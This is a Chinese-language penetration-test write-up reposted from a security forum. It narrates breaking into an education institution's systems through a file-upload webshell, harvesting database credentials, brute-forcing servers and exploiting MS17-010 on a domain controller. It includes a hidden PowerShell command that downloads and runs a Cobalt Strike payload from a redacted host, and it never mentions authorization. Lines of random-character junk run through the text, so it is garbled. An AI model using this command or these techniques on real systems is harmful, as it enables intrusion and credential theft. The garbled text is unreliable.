/ k1 @6 U" Q# ]2 u' K 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
# D& J7 k i; `9 q; Z % P7 n8 N" B: L: ~; J5 v! H- S
. S8 L, D# O8 y0 e: M" K9 C
3 n y7 y4 H4 w
+ w& d; r" E0 a; m
) H6 B) F7 a9 l7 \5 C6 |' W 正文
9 u5 W0 C& Q! h+ Z8 ~4 u c1 F 5 L4 C& D5 r- o( s
" z/ g, F: B0 q/ w5 [5 s- b$ {2 w7 f ( p: ?: r8 H7 X
9 Z H( l5 [ _% T# c% ~# }' E
! P! Y# @( x" l0 c2 R/ ^# Z
目标:www.xxxx.com(一家教育机构) 5 V8 x; d4 L# }
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
, u8 }) O# A& g$ F: N# |" ^! i
5 g; ^1 l( n2 S/ r; d) F$ X4 F" S* G! K4 H: `8 Z9 m$ j: l% T
8 T$ g# @# n9 r: X0 C$ L5 Z
7 E8 q# |( X2 ~+ k
- w/ l$ N- `; I$ {; U
进行了简单的信息搜集
2 ^5 I* b- o4 \/ v( n2 O 3 i+ z8 N- m2 `& |5 D. n* K( s
7 a7 o4 B6 F8 Q' N; O
8 p' J7 K( @5 \& Y
1 U& L# }, x5 J; A! J* j 子域名搜集
# r& ~8 c9 S3 r0 h1 h2 W , O: }, k+ Z( [2 |7 t
# ^, m! q* g. u. ]# D; I
D& g: `# [ ?+ j) B( ]
% p! W" ]1 a$ k ^
5 g4 |' H0 E+ d0 }2 Y7 q) l) { fofa找资产
. X/ Q8 r0 M5 z/ c7 p
! J; ^3 G! s4 y7 [$ l1 h" n6 C
7 g. T# d# x& ]7 C/ N: ?7 p
4 u3 N) ~0 g( g3 h2 _& m8 w. O& }6 f
& \- U- R7 I, R5 o( K) u! F4 v
d% A6 T' q9 v9 ]
/ ^9 d I' O" ]* r1 W 一共七个资产。去重之后只有两个。
. n, g* r; B& I) N. \# c9 F
! l1 Y/ u* Y4 S7 w5 \8 j( ?! H) V" y
! a8 n0 F- w! N9 o; d , \' k7 I8 a) S3 L' p* ?8 w
# z) h# f6 b- } 目录探测% P- H3 _6 J1 U
" n- M+ H3 ?1 c; i7 A% L/ D
7 L/ H v; F% y2 I4 | U# W Q# q: g: w( e
* M z$ {$ a7 ?4 }
2 k1 m2 y# R) y% r) f 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 ? C# C/ u8 `* H& P8 Z ] : p1 q6 ^* B# ^5 S0 l1 [2 F6 K8 U
- r/ E9 j7 O2 u8 w, j( E
% a6 r! d& r1 `8 ?+ G! |5 I, Y0 K' g9 d4 Y: H- d6 K z' W
我又尝试了通过修改返回包来绕过登录界面
7 m" C! w Z" [
4 g X% L+ c) [/ h3 r. y/ K/ Q9 b" W2 j$ P
5 `3 X4 y* V z! `+ n Z' ^
, C3 L% S) d3 @0 ?
8 ]7 J5 m& w& R5 K C) J8 _ 还是不行,尝试注入无果
6 f$ ~$ U% Q+ P+ _ R* C
1 D6 g9 G R8 Q$ P. d0 F1 o% U
0 X, o+ O S# E. Z* m" h. i) K 7 ~5 H, \, }. P
% U7 |; O* V3 ]) f( ?
. e9 l+ W4 l9 N& y' V$ B3 K+ _ 不过我目录探测出了一处Spring信息泄露 , B8 K9 c2 V/ v! ?/ S8 s
$ y3 V1 J, t& u C5 @
' C. @9 C6 I; N: J$ Y1 O
; j) \& |* U9 d5 r2 C# _! N! N) l1 ^! L- |3 X
8 v$ c+ M; P4 I+ B7 F. T$ K9 H" b
2 r. Y) s! e, C) i& \
( x7 G( l0 t3 F; ^0 V 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录; ^( X' K: y* ?
2 k, D$ z+ I" q* O
, {# B3 V! i' C1 T$ d( a2 |) a
" I7 x3 M) R# z 6 G% I* @/ Q4 M$ b" [( v3 S
. |- S8 g2 D C. j; U
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
$ z) u: _) X* N! C/ J" I 3 q! _/ J, b. Q# D' s; R1 s' i
0 G0 g% U5 [5 V5 a6 M$ {, `
3 e2 o) [& d5 T( U6 a8 {3 K1 @
4 i' f( C) k' L( m( V- l# F
( P0 T( V) J O/ b; N( U% ]4 l 获取有些师傅到这一步就手机抓包电脑测了。$ y1 h: X! R/ O4 E y( n- N
& S: Z! ? [( M. Q: C0 H4 v% K* c
8 s2 R7 X0 O8 V
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。1 W( D6 L% {' }$ i _
$ z. p- I! q. A v( o ~8 F/ U" ?
5 F: I! q4 v C" G7 g' z w- ` 其中在一个公众号发现了小程序,可以进行注册。
( t; t! S. A+ b U* F# ~( k0 e ) d8 N3 N: K5 |1 J
+ t8 P0 [: F) U1 |6 ^
看到了头像上传,尝试上传获取WebShell
) w' \) U I& v: i+ v ' K7 f9 m9 D: e; m, n8 n! h k
9 {( R8 G- }* l5 k6 j
4 i( N- P( s% A' Q! V
, r& l, ~7 _/ N" x, u- A: _
* L) s& f) M5 G0 A 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- ?. h# l9 B" D# v
# z5 k2 V8 e1 u1 \* b" B J/ q. p' e( F1 ]/ r, M3 @
6 s# k# k& f, e3 Q! j
+ Q7 o6 C4 a; ~3 }7 }1 D: K$ M- p
" s0 G$ ^% t4 |/ @' d" s1 x 然后上了大马6 u) U F5 Y/ A& N
, Y+ S5 ^4 n' t- \$ ~1 T* w% X& b) E
1 C( c5 J& I+ @+ l% K/ @4 F0 s
0 W0 [; `9 {, t2 ^: E' E
4 \/ w5 r, }6 I0 ?& Y5 g6 g' p
. B( ?" A2 S6 _1 S2 N. J$ H3 x , e0 `; F& Q4 G
: j7 z9 Y2 ?- W' A9 D" ^% u6 k
通过翻找文件发现数据库账号密码
; z7 U! H2 _* A% |, j7 R
3 [6 w, e2 {& d/ I1 ]
* G+ x6 [) z* G) v - K( \+ j+ s3 q4 i2 }) j
' P3 o. @2 ^) v, I' W# ]
* J! a3 A& E6 Q --内网渗透; @" i1 `5 C" k0 f, R8 _
. r, j& p# l) O4 r; v' ]! d
3 @5 N% V( p/ o% M 直接通过powershell执行 cs上线
9 }4 \5 u6 Z/ j* {+ R8 r7 M# O
! z; C) v. X: l0 k6 t! U2 T$ E) N0 c/ p5 l7 C. S9 H" L. e. k
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"5 T1 k8 r- D4 ]" u" m6 F' H
* Y& s4 r6 w* U+ P0 Z Z
$ _" m- \- ~( H( ~4 P/ @
# @! F1 n8 C4 g* E* o) E # }' P$ K' B& U* C2 R! m
# n- _) N5 Z* e* b: c) w6 ?& D
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
1 x0 c8 ^4 ]0 y1 D [ 2 m( g4 @5 ?- R3 X' n5 f5 l
?8 }8 m! s9 q4 C$ z, W3 I3 g$ J
% k9 \$ l2 J2 ^5 L4 X. u
) J' K! D2 B" {: I2 G; ^, v8 g- V9 N; e s
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- I) W H1 \& z+ M- z 6 {$ @1 U* u. n# Z
1 K; C/ }5 W0 q
+ ^) z& g! q6 M9 c
* y- ]% V- B. L' {6 T
6 ~ s! `* `9 f0 y9 `8 S0 @7 U
' E' k0 d( J+ E# j; x5 k3 E
2 L* Q3 D4 @. z2 ]1 t2 Y: X9 E. n# a, ~! u" \& n" x
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 2 x7 L4 i S4 k2 o$ e) R
# |) D2 h5 K, ? s: B% l: m: a& K! r# H5 Y
$ r! X2 Y! q. E1 t
+ S7 ]! C, \( C 3 Y% z" h0 v* F5 l
1 ]5 V6 s/ p9 x! N
. I. O* Z& p, }# a4 B! X+ g
3 g9 ?- \& i3 ~3 @+ p* f0 ~ $ [0 u% O) v B9 _, i9 C- ?
6 u1 b% _2 J9 s }1 {( P
/ m+ l* p+ _3 ~& J" m) P# G6 N, o$ J- r- t1 s& L: c+ Z; _4 \" j/ @. x0 V
) U9 A8 g+ c0 @0 p
9 ^' { @9 N2 A$ \4 ?: d6 x8 c2 ?5 A8 W
小结
3 {5 N' d$ E; ^. M& \+ S+ ] / |! ^% v: t. ~. S
: _' C5 b, z) S+ A" q2 w1 X+ @
! w: T0 c) p: x6 v- y % V. |" v% s( e
# P. G; h9 g3 e 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
- O5 X0 ?* s) l- S& ?4 ^ M
* |1 E" b; z) V* y7 {
]4 p" c, k9 r; c* B
2 R T8 Y7 S# t% `3 i, W. c6 K % w2 b9 U: a+ N' H1 j* D
8 H, S7 S6 `5 S) ~
-
) c) q7 ?0 ^( H4 l( |/ ^
* t8 R8 j; V/ f) C3 ]
! }/ U: J) X8 E) j: x% A. E
-
# @8 R# o& ^- w 9 p" b- ]* K; u) N" X
6 x& M" H' G. s! n- z/ Z, c2 n7 u
G, O7 ^8 G0 j0 K! Q; m
2 ?8 {) d* E! g/ M( ?
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
, K3 l+ z( F% c+ L; i; c; ^9 j+ I
& n" |# h# k' H$ x
2 L, a5 n$ L6 c
5 {% J0 n! |. |, r( w |